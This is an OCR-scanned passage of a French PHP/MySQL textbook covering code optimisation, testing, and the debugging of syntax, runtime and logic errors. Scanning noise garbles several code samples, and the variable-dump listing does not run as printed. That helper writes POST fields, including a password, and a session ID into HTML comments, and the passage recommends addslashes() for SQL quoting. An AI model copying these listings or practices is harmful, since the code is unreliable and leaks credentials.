II existe trois methodes essentielles pour separer la logique et le contenu : 

■ Utiliser des fichiers a inclure qui correspondent aux differentes parties du contenu. 
II s'agit d'une approche tres simple mais, si votre site est essentiellement statique, 
elle peut etre tout a fait suffisante. Ce type d' approche a ete explique dans l'exemple 
de TLA Consulting, au Chapitre 5. 

■ Utiliser une API de fonctions ou de classes avec un ensemble de fonctions membres 
permettant d' inclure du contenu dynamique dans des modeles de pages statiques. 
Nous avons deja vu cette approche au Chapitre 6. 

■ Utiliser un systeme de modeles (templates). Ce type de systeme analyse des modeles 
statiques et se sert d'expressions regulieres pour remplacer des marqueurs d'empla- 
cements par des donnees dynamiques. L'avantage principal de cette approche est 
que, si vos modeles sont congus par quelqu'un d'autre (par exemple, un concepteur 
graphique), cette personne n'a pas du tout besoin de savoir programmer en PHP 
Vous devriez etre capable d' utiliser les modeles fournis avec un minimum de modi- 
fications. 

H existe un certain nombre de systemes de modeles, dont le plus populaire est probablement 
Smarty, disponible sur le site http://smarty.php.net/. 

Optimisation du code 

Si vous venez d'un autre milieu que la programmation web, les optimisations peuvent 
vous sembler tres importantes. Cependant, avec PHP, la plupart des ralentissements 
dont souffrent les utilisateurs proviennent des temps de connexion et de chargement. 
L' optimisation du code aura done peu d'influence sur ces delais. 

Quelques optimisations simples 

Vous pouvez pourtant apporter quelques optimisations qui reduiront significativement 
ces delais. La plupart d'entre elles concernent les applications qui utilisent une base de 
donnees comme MySQL avec du code PHP. En voici une liste non exhaustive : 

H Reduisez les connexions aux bases de donnees. La connexion a une base de donnees 
est souvent la partie la plus lente d'un script. 
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I Accelerez les requetes de bases de donnees. Reduisez le nombre de requetes que 
vous effectuez et assurez-vous qu'elles sont optimisees. Pour les requetes comple- 
xes (et par consequent lentes), vous avez generalement plusieurs moyens a votre 
disposition. Executez les requetes a partir de la ligne de commande de votre base de 
donnees et testez differentes approches pour les optimiser. Avec MySQL, vous 
pouvez vous servir de l'instruction EXPLAIN (voir le Chapitre 12) pour tracer le 
fonctionnement des requetes. D'une maniere generale, le principe consiste a mini- 
miser le nombre de jointures et a maximiser l'utilisation des index. 

■ Reduisez au minimum la production de contenus statiques a partir de PHR Si tout 
votre code HTML provient de echo ou de print (), il sera beaucoup plus lent. II 
s'agit encore d'un argument en faveur de la separation de la logique et du contenu. 
Ce principe s' applique egalement a la generation dynamique des images des 
boutons : il est preferable d'utiliser PHP pour produire les boutons au debut et de les 
reutiliser ensuite lorsque vous en avez besoin. Si vous generez des pages totalement 
statiques a partir de fonctions ou de modeles a chaque fois qu'une page est chargee, 
il peut etre interessant d'executer les fonctions ou d'utiliser les modeles une seule 
fois et d'enregistrer le resultat obtenu. 

■ Lorsque cela est possible, preferez les fonctions sur les chames aux expressions 
regulieres, car elles sont plus rapides. 

Utilisation des produits de Zend 

Zend Technologies detient le moteur de PHP open-source depuis sa version 4. Outre ce 
moteur de base, vous pouvez egalement telecharger Zend Optimizer, un outil d' optimi- 
sation en plusieurs passes permettant d' optimiser votre code et d'ameliorer la vitesse 
d'execution de vos scripts d'un facteur de 40 a 100 %. Bien qu'il s'agisse d'un produit 
proprietaire, vous pouvez le telecharger gratuitement sur le site de Zend, http:// 
www.zend.com/. 

Ce module optimise le code obtenu lors de la compilation de vos scripts. Zend propose 
egalement d'autres produits, comme Zend Studio, Zend Accelerator, Zend Encoder 
ainsi que plusieurs offres de support commercial. 

Tests 

Bien que le test du code soit un autre concept essentiel du genie logiciel, il est souvent 
oublie dans le developpement web. II est trop tentant de tester le systeme final avec 
deux ou trois exemples et de dire ensuite "OK, ca marche". II s'agit d'une erreur tres 
repandue. Avant de considerer que votre projet est pret pour etre mis en production, 
assurez-vous que vous avez teste integralement tous les scenarios possibles. 
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Nous vous suggerons deux approches pour reduire le nombre d'erreurs dans vos 
programmes. II n'est jamais possible de les eliminer toutes, mais il est deja interessant 
d'en eliminer la plus grande partie. 

Tout d'abord, prenez l'habitude de verifier votre code. Pour cela, il suffit generalement 
de demander a un autre membre de votre equipe d' examiner votre code et de suggerer 
quelques ameliorations. Ce type d' analyse met souvent en evidence les points suivants : 

■ les erreurs auxquelles vous n' avez pas prate attention ; 

■ les eventualites auxquelles vous n' avez pas pense ; 

■ les optimisations ; 

■ les ameliorations au niveau de la securite ; 

■ les composants existants dont vous pouvez tirer profit pour ameliorer certaines 
parties de votre code ; 

■ de nouvelles fonctionnalites. 

Si vous travaillez tout seul, essayez de trouver un collegue qui se trouve dans la meme 
situation que vous, afin de vous aider mutuellement a corriger vos programmes. 

Vous pouvez egalement chercher des testeurs pour votre application, representatifs des 
utilisateurs de votre produit. La difference essentielle entre les applications web et les 
applications de bureautique est que les applications web sont utilisees un peu par 
n'importe qui. II vaut done mieux ne pas supposer que vos utilisateurs ont l'habitude de 
l'informatique. Comme il est impossible de leur fournir un petit manuel ou une carte 
de reference rapide, vos applications doivent etre documentees de maniere tres 
complete et etre tres simples a utiliser. Vous devez penser a toutes les manieres dont vos 
utilisateurs pourront se servir de votre application. La simplicite d'utilisation prime par 
rapport a tout le reste. 

Si vous utilisez le Web depuis plusieurs annees, il n'est pas toujours evident de penser a 
tous les problemes auxquels les utilisateurs debutants seront confrontes. C'est pour cela 
qu'il est important de faire tester votre application par des personnes tres differentes. 

Dans cette optique, nous avions pris l'habitude de diffuser nos applications en version 
beta. Lorsque vous pensez avoir elimine la majorite des erreurs, diffusez votre applica- 
tion aupres d'un petit groupe de testeurs pour obtenir un petit trafic sur votre site. Vous 
pouvez par exemple proposer des services gratuits aux cent premiers utilisateurs en 
echange de commentaires sur votre site. Nous vous garantissons que vous obtiendrez de 
cette maniere des exemples d'utilisation auxquels vous n'aviez jamais pense. Si vous 
mettez en place un site web pour une entreprise cliente, il est souvent possible d'effectuer 
ces tests aupres de certains salaries de cette entreprise. 
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Pour aller plus loin 

Un tres grand nombre de livres ont ete dents a propos du genie logiciel. 

Un ouvrage tres interessant qui explique les differences entre le developpement d'un 
site web oriente document et celui d'un site web oriente application est Web Site Engi- 
neering: Beyond Web Page Design, de Thomas A. Powell. Mais tout bon livre sur le 
genie logiciel vous sera egalement tres profitable. 

Pour plus d' informations sur les systemes de controle de versions, consultez le site web 
de CVS, http://www.ximbiot.com/cvs/wiki/. 

II n'existe pas beaucoup de livres sur les systemes de controle de versions (ce qui est 
assez etonnant vu leur importance), mais vous pouvez consulter par exemple Open 
Source Development with CVS, de Karl Franz Fogel, ou CVS Pocket Reference, de 
Gregor N. Purdy. 

Si vous cherchez des composants PHP, des IDE ou des systemes de documentation, 
consultez le site de SourceForge, http://sourceforge.net/. 

La plupart des sujets que nous avons abordes dans ce chapitre etant etudies en detail 
dans des articles publics sur le site de Zend, http://www.zend.com/, il peut etre interes- 
sant de le visiter si vous souhaitez obtenir plus d' informations. Vous pourrez egalement 
vous y procurer l'optimiseur de code. 

Si ce chapitre vous a interesse, vous pouvez consulter le site de Extreme Programming, qui 
est une methodologie de developpement de logiciels destinee aux domaines dans lesquels 
les conditions de developpement changent frequemment, ce qui est le cas du developpement 
web. Ce site se trouve a l'URL http://www.extremeprogramming.org/. 

Pour la suite 

Au Chapitre 24, nous passerons en revue differents types d'erreurs de programmation, 
les messages d'erreur de PHP et des techniques permettant d'identifier et de corriger les 
erreurs. 
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Ce chapitre est consacre au debogage des scripts PHP. Si vous vous etes deja servi des 
exemples precedents de ce livre ou si vous avez deja utilise PHP, vous possedez proba- 
blement vos propres techniques de debogage. Au fur et a mesure que vos projets 
deviendront de plus en plus complexes, le debogage peut devenir plus difficile. Meme si 
vos connaissances en la matiere s'amelioreront progressivement, les erreurs peuvent 
impliquer plusieurs fichiers ou des interactions entre du code developpe par des personnes 
differentes. 

Les erreurs de programmation 

Quel que soit le langage que vous utilisiez, il existe trois principaux types d' erreurs de 
programmation : 

■ les erreurs de syntaxe ; 

■ les erreurs en cours d' execution ; 

■ les erreurs de logique. 

Nous allons expliquer rapidement en quoi consistent ces erreurs, avant de nous interes- 
ser a plusieurs strategies permettant de detecter, de gerer, d'eviter et de resoudre les 
erreurs. 

Erreurs de syntaxe 

Tous les langages doivent suivre certaines regies, appelees syntaxe du langage, qui 
doivent etre respectees par les instructions des programmes pour que celles-ci soient 
considerees comme correctes. Ceci est valable a la fois pour les langages naturels, 
comme le francais, et les langages de programmation, comme PHP. Si une instruction 
ne respecte pas les regies du langage, on dit qu'il y a une erreur de syntaxe. Les erreurs 
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de syntaxe sont egalement appelees erreurs d 'interpretation, lorsqu'on parle de langa- 
ges interpretes comme PHP, ou erreurs de compilation pour les langages compiles 
comme C ou Java. 

Si vous ne respectez pas les regies de syntaxe du francais, vos auditeurs reussiront 
generalement quand meme a comprendre ce que vous voulez dire. Cela n'est generale- 
ment pas vrai pour les langages de programmation. Si un script ne respecte pas les 
regies de syntaxe de PHP (c'est-a-dire s'il contient des erreurs de syntaxe), l'analyseur 
de PHP ne sera pas capable de le traiter. A la difference des ordinateurs, les etres 
humains sont capables de deduire des informations valides a partir de donnees partielles 
ou erronees. 

La syntaxe de PHP necessite notamment que les instructions se terminent par un point- 
virgule, que les chaines soient mises entre apostrophes et que les parametres passes aux 
fonctions soient separes par des virgules et mis entre parentheses. Si vous ne respectez 
pas ces regies, votre script PHP ne fonctionnera pas et produira un message d'erreur des 
que vous tenterez de l'executer. 

L'un des grands avantages de PHP reside dans la clarte de ses messages d'erreur lors- 
que les choses tournent mal. En effet, ils indiquent generalement la cause de l'erreur, le 
fichier dans lequel l'erreur se trouve et le numero de la ligne en cause. 

Un message d'erreur ressemble a ceci : 

Parse error: parse error, unexpected 1,1 in 

/home/book/public_html/phpmysql4e/chapitre24/erreur.php on line 2 
Cette erreur a ete produite par le script suivant : 
<?php 

$date = date(d.m.y 1 ) ; 

?> 

Vous pouvez constater que nous tentons de passer une chaine a la fonction date ( ) , mais 
que nous avons oublie la premiere apostrophe qui marque le debut de la chaine. 

Generalement, les erreurs de syntaxe sont assez simples et assez faciles a identifier. 
Nous pouvons imaginer une erreur similaire, mais plus difficile a trouver, en oubliant 
1' autre apostrophe : 

<?php 

$date = date( 'd.m.y) ; 

?> 

Ce script produira l'erreur suivante : 

Parse error: parse error, unexpected $end in 

/home/book/public_html/phpmysql4e/chapitre24/erreur.php on line 4 
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II est evident que l'erreur ne peut pas se trouver sur la quatrieme ligne puisque notre 
script ne contient que trois lignes. Ce type de message d'erreur est significatif de l'oubli 
d'un element de fermeture, comme une apostrophe ou une parenthese. 

Le script suivant provoquera une erreur de syntaxe similaire : 

<?php 

if (true) { 

echo ' Une erreur 1 ; 

?> 

Ces erreurs sont difficiles a identifier lorsqu'elles font intervenir plusieurs fichiers ou 
si elles se trouvent dans un gros fichier. II arrive parfois que Ton passe une journee 
entiere a resoudre une erreur "parse error on line 1001" dans un fichier de 
1 000 lignes, mais cela devrait vous inciter a faire un effort pour ecrire du code plus 
modulaire ! 

Cependant, et d'une maniere generale, les erreurs de syntaxe sont les plus simples a 
identifier. Si vous faites une erreur de syntaxe et que vous essayiez d'executer votre 
bloc de code, PHP affichera un message indiquant l'endroit ou se trouve cette erreur. 

Erreurs en cours d'execution 

Les erreurs qui surviennent en cours d'execution sont plus difficiles a detecter et a 
corriger. Une erreur de syntaxe existe ou elle n'existe pas et, si votre script contient une 
erreur de syntaxe, l'analyseur la detecte. Les erreurs au moment de l'execution, en 
revanche, ne sont pas causees uniquement par le contenu de votre script : elles peuvent 
provenir de l'interaction entre vos scripts, d'autres evenements ou d'autres conditions. 

L instruction suivante, par exemple : 

require ( ' nomf ic . php 1 ) ; 
est une instruction PHP parfaitement valide. Elle ne contient aucune erreur de syntaxe. 

Cependant, elle peut produire une erreur lorsqu'elle est executee. En effet, si vous 
l'executez alors que le fichier nomfic.php n'existe pas, ou si l'utilisateur sous le compte 
duquel votre script est execute n'a pas acces a ce fichier, vous obtiendrez un message 
d'erreur ressemblant a ceci : 

Fatal error: main() [function. require] : Failed opening required 
'nomfic.php' 

(include_path=' . : /usr/local/lib/php ' ) in 

/home/book/public_html/phpmysql4e/chapitre24/erreur.php on line 1 

Bien que votre programme ne contienne aucune erreur, il peut produire une erreur 
lorsqu'il est execute, puisqu'il utilise un fichier qui peut ne pas exister. 
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Les trois instructions suivantes sont des instructions PHP valides. Malheureusement, 
lorsqu'on les utilise dans cet ordre, on obtient une division par zero, qui est une operation 
impossible. 

$i = 10; 

$j = 0; 

$k = $i/$1 ; 

Ce petit programme produira 1' avertissement suivant : 
Warning: Division by zero in 

/home/book/public_html/phpmysql4e/chapitre24/div0.php on line 3 

Grace a ce message, il est tres simple de corriger l'erreur. II est tres rare qu'un program- 
meur tente d'effectuer volontairement une division par zero, mais oublier de filtrer 
correctement des donnees saisies par l'utilisateur provoque souvent ce type d'erreur. 

Le code suivant produit quelquefois la meme erreur, qui peut etre bien plus difficile a 
isoler et a corriger car elle n'intervient qu' a certains moments : 

$i = 10; 

$k = $i/$_REQUEST[ 1 saisie 1 ] ; 

II s'agit de l'une des nombreuses erreurs pouvant survenir au cours de 1' execution de 
vos programmes. 

Les erreurs survenant en cours d'execution sont souvent provoquees par les problemes 
suivants : 

■ des appels a des fonctions qui n' existent pas ; 

■ des lectures ou des dentures dans des fichiers qui n' existent pas ; 

I des interactions avec MySQL ou d'autres bases de donnees ; 

■ des connexions a des services reseaux ; 

H oublier de filtrer les donnees saisies par l'utilisateur. 

Nous allons maintenant nous interesser a chacun de ces problemes. 

Appeler des fonctions qui n 'existent pas 

II est assez facile d' appeler par inadvertance une fonction qui n'existe pas. Les noms 
des fonctions integrees ne sont souvent pas tres coherents. Pourquoi y a-t-il un caractere 
souligne dans strip tags(), alors qu'il n'y en a aucun dans stripslashes(), par 
exemple ? 

II est egalement assez frequent d' appeler l'une de vos propres fonctions, qui n'existe 
pas dans le script courant mais qui peut se trouver dans un autre script. Si votre code 
contient un appel a une fonction qui n'existe pas, par exemple : 

f onction_inexistante ( ) ; 
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ou 

f onction_mal_orthographiee ( ) ; 

vous obtiendrez un message d'erreur semblable a celui-ci : 

Fatal error: Call to undefined function: f onction_inexistante ( ) 

in /home/book/public_html/phpmysql4e/chapitre24/erreur. php on line 1 

De meme, si vous appelez une fonction qui existe, mais que vous ne donniez pas le bon 
nombre de parametres, vous recevrez un avertissement. 

La fonction strstr(), par exemple, attend deux chaines : une grande chaine et une 
sous-chaine a rechercher dans celle-ci. Si nous nous contentons de l'appeler ainsi : 

strstr( ) ; 

Nous obtiendrons 1' avertissement suivant : 

Warning: Wrong parameter count for strstr() in 
/home/book/public_html/phpmysql4e/chapitre24/erreur.php on line 1 

Cette meme instruction situee dans le script suivant est egalement fausse : 

<?php 

if($var == 4) 
{ 

strstr( ) ; 

} 

?> 

mais, sauf si la variable $var contient la valeur 4, l'appel a strstr ( ) n'est pas execute 
et aucun avertissement n'apparait. L'interpreteur PHP ne perd pas de temps a analyser 
les sections de votre code qui ne sont pas requises pour 1' execution courante du script. 
Veillez done a la pertinence de vos tests ! 

II est assez facile d'appeler des fonctions d'une maniere erronee, mais, comme les 
messages d'erreur obtenus permettent d'identifier avec precision la ligne et l'appel de 
fonction ayant pose probleme, il est tout aussi facile de resoudre ces erreurs. Elles ne 
sont difficiles a identifier que si vos procedures de test ne sont pas tres poussees et si 
elles ne testent pas toutes les conditions de votre code. Lorsque vous effectuez vos tests, 
l'un des objectifs est d'executer chaque ligne du code. Un autre but est de tester toutes 
les conditions aux limites, ainsi que les classes des donnees d'entree. 

Lectures et ecritures dans des fichiers 

Bien que n'importe quelle partie d'un programme puisse poser probleme au cours de 
son execution, certaines erreurs apparaissent plus frequemment que d'autres. Les 
erreurs d'acces aux fichiers sont suffisamment courantes pour qu'il faille prendre la 
peine de les gerer correctement. Les disques durs peuvent tomber en panne ou ne plus 
posseder d'espace de stockage disponible et des mauvaises manipulations peuvent 
changer les permissions d'acces a des repertoires ou a des fichiers. 
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Les fonctions comme fopen(), qui peuvent produire occasionnellement une erreur, 
renvoient generalement un resultat indiquant si une erreur s'est produite. Dans le cas de 
f open ( ) , il s'agit de la valeur false. 

Avec les fonctions qui indiquent si une erreur s'est produite, vous devez verifier avec 
precaution la valeur renvoyee par chaque appel et agir en consequence. 

Interactions avec MySQL ou d'autres bases de donnees 

L'utilisation de MySQL peut entrainer un grand nombre d'erreurs. La fonction 
mysqli connect ( ) peut produire a elle seule les erreurs suivantes : 

■ Warning: mysqli connect() [function . mysqli connect]: Can't connect to 
MySQL server on 'localhost' (10061) 

■ Warning: mysqli connect() [function. mysqli connect]: Unknown MySQL 
Server Host 'note' (11001) 

■ Warning: mysqli connect() [function .mysqli connect]: Access denied for 
user: ' utilisateur ' @ ' localhost ' (Using password: YES) 

Comme vous pouvez vous y attendre, mysql connect () renvoie false lorsqu'une 
erreur se produit. Cela signifie que vous pouvez facilement gerer ce type d'erreur. 

Si vous n'inteiTompez pas l'execution classique de votre script pour gerer ces erreurs, il 
continuera a interagir normalement avec la base de donnees. Si vous tentez d'executer 
des requetes sans connexion MySQL valide, vos visiteurs obtiendront plusieurs messages 
d'erreur, ce qui ne fait pas tres professionnel. 

Plusieurs autres fonctions PHP faisant intervenir MySQL, comme mysqli query (), 
renvoient egalement false pour indiquer qu'une erreur s'est produite. 

Si vous detectez une erreur, vous pouvez recuperer le texte du message d'erreur grace a la 
fonction mysql error ( ), ou un code d'erreur en utilisant la fonction mysqli errno( ). Si 
la derniere fonction MySQL n'a pas produit d'erreur, mysqli error ( ) renvoie une chaine 
vide et mysqli errno( ) renvoie 0. 

Par exemple, en supposant que nous sommes connectes au serveur et que nous avons 
selectionne une base de donnees, le fragment de code suivant : 

$resultat = mysqli_query ($db, "select * from table_inexistante " ); 

echo mysqli_errno($db) ; 

echo "<br />"; 

echo mysqli_error($db) ; 

renverra le resultat suivant : 

1146 

Table "nombase. table inexistante" doesn't exist 
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Vous remarquerez que la sortie de ces fonctions fait reference a la derniere fonction 
MySQL executee, a part mysql error () ou mysql errno(), evidemment. Si vous 
souhaitez connaitre le resultat d'une commande, n'oubliez pas de recuperer ce qu'elles 
renvoient avant d'executer une autre fonction. 

Tout comme les erreurs d'acces aux fichiers, des erreurs d'interaction avec des bases de 
donnees finiront par se produire. Meme apres la fin du developpement et du test d'un 
service, vous vous rendrez compte occasionnellement que le demon MySQL (mysqld) 
s'est plante, ou qu'il n'y a plus assez de connexions disponibles. Si votre base de 
donnees est executee sur un autre ordinateur, cela implique que vous faites confiance a un 
autre ensemble de composants logiciels et materiels, qui peuvent poser probleme (par 
exemple une connexion reseau, une carte reseau, des routeurs, ou tout autre element se 
trouvant entre votre serveur web et 1' ordinateur hebergeant la base de donnees). 

II faut toujours verifier que vous avez pu etablir correctement une connexion vers votre 
base de donnees avant de vous en servir. II n'y a aucun interet a tenter d'executer une 
requete si la connexion n'a pas pu etre ouverte, pas plus qu'il n'y en a a tenter d'extraire 
et de traiter les resultats d'une requete si celle-ci n'a pas abouti. 

II est important de remarquer a ce stade qu'il existe une difference entre une requete qui 
ne peut pas etre executee et une requete qui fonctionne mal, par exemple en ne 
renvoyant aucune donnee ou en ne modifiant pas les lignes qu'elle devrait modifier. 

Une requete SQL qui contient des erreurs de syntaxe SQL ou qui fait reference a des 
bases de donnees, a des tables ou a des colonnes inexistantes peut ne pas aboutir. 
Par exemple, la requete suivante : 

select * from table_inexistante; 

ne fonctionne pas parce que la table n' existe pas. Elle produit un numero d'erreur (ainsi 
qu'un message d'erreur) que vous pouvez recuperer avec les fonctions mysql errno( ) 
et mysql error( ). 

Une requete SQL dont la syntaxe est valide et qui ne fait reference qu'a des bases de 
donnees, a des tables et a des colonnes qui existent n'entraine generalement aucune 
erreur. Cependant, ce type de requete peut ne renvoyer aucun resultat si elle fait interve- 
nir une table vide, ou si elle recherche des donnees qui n'existent pas. En supposant que 
vous ayez etabli une connexion vers votre base de donnees et que vous possediez une 
table appelee t1 contenant une colonne appelee c1 , la requete suivante : 

select * from t1 where c1 = 'pas dans la base'; 

s'effectue correctement, mais ne produit aucun resultat. 

Avant de pouvoir utiliser le resultat d'une requete, il faut done verifier qu'elle n'a 
produit aucune erreur et qu'elle renvoie bien un resultat. 
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Connexions d des services reseaux 

Bien que les peripheriques et les autres programmes de votre systeme puissent parfois 
tomber en panne, cela devrait rester assez rare a moins qu'ils ne soient de mauvaise 
qualite. Si vous utilisez un reseau pour vous connecter a d' autres ordinateurs, vous 
devez accepter que certaines parties de votre systeme puissent tomber en panne plus 
souvent car, pour connecter un ordinateur a un autre, vous devez passer par plusieurs 
peripheriques et services que vous ne controlez pas forcement. 

Vous devez done verifier avec beaucoup de precautions la valeur renvoyee par les fonctions 
qui tentent d'interagir avec un service reseau. 

Un appel de fonction comme : 

$sp = fsockopen ( 'localhost', 5000 ); 

produira un avertissement s'il n' arrive pas a se connecter sur le port 5000 de l'ordina- 
teur localhost, mais il l'affichera au format par defaut et ne donnera pas a votre script 
la possibilite de le gerer elegamment. 

En revanche, si vous reecrivez cet appel sous la forme suivante : 

$sp = ©fsockopen ( 'localhost', 5000, &$errorno, &$errorstr ); 
if (!$sp) { 

echo "ERREUR : $errorno: $errorstr"; 

} 

cela supprimera le message d'erreur predefini, verifiera la valeur de retour pour voir si 
une erreur s'est produite et utilisera votre propre code pour gerer le message d'erreur. 
Ce code affichera done un message d'erreur qui pourra vous aider a resoudre le 
probleme. Dans le cas present, cet exemple produirait le message suivant : 

ERREUR: 10035: A non-blocking socket operation could not be completed immediately. 
Les erreurs survenant en cours d'execution sont plus difficiles a eliminer que les erreurs 
de syntaxe, car l'analyseur ne peut pas les signaler au lancement du code. Comme ces 
erreurs surviennent dans certaines conditions, il est parfois difficile de les detecter et de 
les corriger. L'analyseur ne peut pas vous indiquer automatiquement qu'une ligne gene- 
rera une erreur. Votre procedure de test doit done fournir un moyen d'identifier les 
situations qui produisent des erreurs. 

La correction de ces erreurs necessite une bonne dose d'imagination pour identifier les 
differents cas de figure susceptibles de se presenter et pour choisir une action appro- 
priate. En outre, ces tests doivent etre suffisamment complets pour simuler et tenter 
d'identifier chaque classe d'erreur qui peut survenir. 

Cela ne signifie pas que vous deviez tenter de simuler toutes les erreurs qui peuvent se 
produire : MySQL, par exemple, peut generer a lui seul environ deux cents erreurs 
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differentes. Vous devez en revanche simuler une erreur dans chaque appel de fonc- 
tion pouvant poser probleme et une erreur de chaque type geree par un bloc de code 
different. 

Oublier de filtrer les donnees d'entree 

II arrive souvent que les programmeurs fassent des suppositions plus ou moins hasar- 
deuses sur les donnees saisies par les utilisateurs. Si un utilisateur entre des donnees 
auxquelles les programmeurs n'ont pas pense, cela peut entrainer des erreurs au 
moment de l'execution ou des erreurs de logique (sur lesquelles nous reviendrons dans 
la section suivante). 

Un exemple classique d'erreur d'execution peut se presenter lorsque vous traitez des 
donnees saisies par l'utilisateur en oubliant de leur appliquer la fonction addslashes ( ) . 
Si vous avez affaire a un utilisateur dont le nom contient une apostrophe, comme 
O'Grady, vous obtiendrez une erreur si vous utilisez ce nom entre apostrophes simples 
dans une instruction SQL d' insertion. 

Nous reviendrons sur les erreurs provenant des suppositions sur les donnees saisies 
dans la prochaine section. 

Erreurs de logique 

Les erreurs de logique sont les plus difficiles a identifier et a supprimer. On dit qu'il y a 
une erreur de logique lorsque le code fait exactement ce qu'il doit faire, mais que cela 
ne correspond pas a ce que le programmeur avait l'intention d'obtenir. 

Les erreurs de logique peuvent provenir d'une simple faute de frappe, comme ici : 

for ( $i = 0; $i < 10; $i++ ) ; 
{ 

echo "faire quelque chose<br />"; 

} 

Cet extrait de code est tout a fait correct. II respecte toutes les regies de syntaxe de PHP, 
ne fait appel a aucun service externe, done il a peu de chances de produire des erreurs 
au moment de son execution. Cependant, il contient une erreur de logique puisqu'il 
n'affiche la chaine de caracteres qu'une seule fois. 

Au premier abord, il semblerait que la boucle for soit executee dix fois, en affichant 
"faire quelque chose" a chaque iteration. 

Mais le point- virgule situe a la fin de la premiere ligne indique la fin de 1' instruction. La 
boucle for est done executee dix fois, mais il n'y a aucune instruction dans le corps de 
la boucle. Linstruction echo n'est ensuite executee qu'une seule fois. 

Comme ce code est correct, l'analyseur ne produira aucune erreur. Les ordinateurs sont 
tres performants pour certaines operations, mais ils n'ont ni sens logique ni intelligence : 
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ils font exactement ce qu'on leur demande de faire. Vous devez done vous assurer que 
vous leur donnez des instructions suffisamment precises pour faire ce que vous souhaitez. 

Les erreurs de logique ne sont pas provoquees par le code lui-meme, mais elles 
proviennent de la maniere dont les programmeurs ecrivent les instructions que l'ordi- 
nateur doit executer. Par consequent, ces erreurs ne peuvent pas etre detectees auto- 
matiquement. Vous ne serez jamais averti qu'une erreur de ce type s'est produite et 
aucun logiciel ne pourra vous fournir le numero de la ligne mise en cause. Les erreurs 
de logique ne peuvent etre detectees que par une procedure de test suffisamment 
complete. 

L' erreur de logique de l'exemple precedent est tres simple a faire, mais egalement tres 
simple a corriger, puisque la premiere fois que votre code est execute vous pouvez 
constater aussitot que la sortie ne correspond pas a ce que vous attendiez. Cependant, la 
plupart de ces erreurs sont un peu plus subtiles. 

La plupart du temps, les erreurs de logique ont lieu lorsque le programmeur fait des 
hypotheses qui ne sont pas fondees. Au Chapitre 23, nous vous avions suggere de faire 
appel aux autres developpeurs de votre equipe pour verifier vos programmes et pour 
proposer de nouvelles procedures de tests, et de faire appel a des personnes representa- 
tives de votre audience pour imaginer de nouveaux cas de figure. Si vous effectuez 
vous-meme vos propres tests, il est tres facile de supposer que les utilisateurs ne saisi- 
ront que certains types de donnees et, par consequent, d'oublier de verifier certaines 
parties du code. 

Imaginons que votre site commercial utilise un champ de saisie correspondant au 
nombre d' articles commandes. Avez-vous pense au fait que certains utilisateurs pour- 
ront essayer de saisir un nombre negatif, afin que votre site credite leur carte bancaire 
au lieu de la debiter ? 

Supposons que vous utilisiez un champ de saisie permettant d'entrer un montant en 
euros. Permettez-vous a vos utilisateurs de saisir ce montant avec ou sans le signe "€", 
ou de separer les chiffres des milliers avec une espace ? Certaines de ces verifications 
peuvent etre effectuees au niveau du client (avec JavaScript, par exemple) pour reduire 
un peu la charge de votre serveur. 

Si vous transmettez des informations a une autre page, avez-vous pense que certains 
caracteres ont une signification particuliere dans les URL, les espaces notamment ? 

II existe une quantite infinie d'erreurs de logique et aucune maniere automatique de les 
verifier. La seule solution consiste a eliminer les hypotheses effectuees par le program- 
meur, puis a tester d'une maniere aussi complete que possible toutes les donnees 
pouvant etre saisies par les utilisateurs. 
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Aide au debogage des variables 

Lorsque vos projets deviendront plus complexes, il pourra etre interessant de posseder 
quelques programmes utilitaires vous permettant d'identifier l'origine des erreurs. Le 
Listing 24.1 contient un script qui pourra vous etre utile, puisqu'il affiche le contenu 
des variables passees a votre page. 

Listing 24.1 : affiche_variables.php — Ce programme peut etre inclus dans vos pages 
pour afficher le contenu des variables passees 



<?php 

// Ces lignes formatent la sortie en commentaires HTML 
// et appellent la fonction affiche_tab. 

echo "\n<!-- DEBUT AFFICHAGE VARIABLES -->\n\n"; 



echo 
echo 

echo 
echo 

echo 
echo 

echo 
echo 



<!-- DEBUT VARIABLES GET -->\n"; 

<!-- " .affiche_tab($_GET) . " -->\n"; 

<!-- DEBUT VARIABLES POST -->\n"; 

<!-- " .affiche_tab($_POST) . " — >\n"; 

<!-- DEBUT VARIABLES SESSION — >\n"; 

<!-- " .affiche_tab($_SESSION) . " -->\n" 

<!-- DEBUT VARIABLES COOKIE -->\n"; 

<!-- " .affiche_tab($_COOKIE) . " -->\n"; 



echo "\n<!-- FIN AFFICHAGE VARIABLES -->\n"; 

// af f iche_tab( ) prend un tableau en parametre. 

// Elle parcourt ce tableau afin de former une seule chaine 

// pour representer le tableau sous la forme d'un ensemble. 

function aff iche_tab($tab) { 
if (is_array($tab) ) { 
$taille = count (Sarray) ; 
Schaine = " " ; 
if (Staille) { 
$nbre = 0; 
$chaine .= "{ "; 

// Ajoute les cles et les valeurs de chaque element a chaine 
foreach($tab as $var => $valeur) { 

$chaine .= $var. " = " . Svaleur; 

if($nbre++ < ($taille-1)) { 
$chaine .= ", "; 

} 

} 

$chaine .= " }"; 

} 

return Schaine; 
} else { 

// Si ce n'est pas un tableau, on se contente de le renvoyer 
return Stab; 

} 

} 
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Ce code passe en revue les quatre tableaux de variables recues par une page. Si une 
page a ete appelee avec des variables GET, des variables POST, des cookies ou des 
variables de session, celles-ci seront affichees. 

Ici, nous avons place les sorties dans des commentaires HTML afin que vous puissiez 
les visualiser sans interferer avec la presentation normale de la page. II s'agit d'un bon 
moyen de produire des informations de debogage. Cacher les informations de debogage 
dans des commentaires permet en outre de les laisser dans le code jusqu'au dernier 
moment. 

La sortie exacte dependra des variables passees a la page mais, lorsqu'on ajoute ce 
script au Listing 21.4, l'un des exemples d'authentification du Chapitre 21, il ajoute les 
lignes suivantes au code HTML produit : 

<!-- DEBUT AFFICHAGE VARIABLES --> 

<!-- DEBUT VARIABLES GET --> 

<!-- Array 

( 

) 

--> 

<!-- DEBUT VARIABLES POST --> 

<!-- Array 

( 

[nom] => utilisateur 
[mdp] => secret 

) 

--> 

<!-- DEBUT VARIABLES SESSION --> 

<!-- Array 

( 

) 

--> 

<!-- DEBUT VARIABLES COOKIE --> 

<!-- Array 

( 

[PHPSESSID] => b2b5f56fad986dd73af33f470f3c1865 

) 

--> 

<!-- FIN AFFICHAGE VARIABLES --> 

Vous pouvez constater que les variables POST du formulaire d'ouverture de session de la 
page precedente (nom et mdp) sont affichees. Ce script affiche egalement la variable de 
session dont nous nous servons pour conserver le nom de l'utilisateur, utilisateur ok. 
Comme nous 1' avons vu au Chapitre 21, PHP se sert d'un cookie pour associer les 
variables de session a chaque utilisateur. Notre script affiche done egalement le chif- 
fre pseudo-aleatoire, PHPSESSID, qui est enregistre dans ce cookie pour identifier 
l'utilisateur. 
